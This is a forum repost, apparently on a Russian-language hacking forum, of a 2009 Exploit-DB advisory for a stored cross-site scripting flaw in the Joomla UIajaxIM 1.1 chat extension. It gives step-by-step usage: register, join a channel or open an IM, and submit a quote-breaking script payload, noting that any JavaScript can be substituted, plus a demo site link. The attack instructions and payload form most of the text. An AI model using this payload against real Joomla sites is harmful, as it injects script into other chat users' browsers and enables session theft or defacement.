Exploit Joomla! Extension UIajaxIM 1.1 - JavaScript Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9244
Проверка EDB
  1. Пройдено
Автор
599EME MAN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2009-07-24
Код:
_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
_________________________________________________________________



# [+] Joomla Extension UIajaxIM 1.1 Javascript Execution
# [+] Software : Joomla
# [+] Author : 599eme Man
# [+] Contact : [email protected]
# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell...
# [+] Special Thanks : Moudi Aka SixSo  brozazaaaaaaaaa
# [+] Download : http://extensions.joomla.org/extensions/communication/chat/9075/details
#
#[------------------------------------------------------------------------------------]
# 
# [+] Vulnerability
#
#	[+] Javascript Execution
#
#		- Go in : http://www.site.com/ajaxim/, regist you and connect. Join a channel and in the input write : 'r"'><script>alert('xss')</script> (or any javascript after the 'r"'>) and press enter : the javascript is executed.
#		- Click on IM anyone and write in the input : 'r"'><script>alert('xss')</script> (or any javascript after the 'r"'>) and press enter : the javascript is executed
#
#			[+] Demo
#
#				- http://demo.universal-informatique.com/ajaxim/
#
#[------------------------------------------------------------------------------------]
#
#########################################################################################################

# milw0rm.com [2009-07-24]
 
Источник
www.exploit-db.com

Похожие темы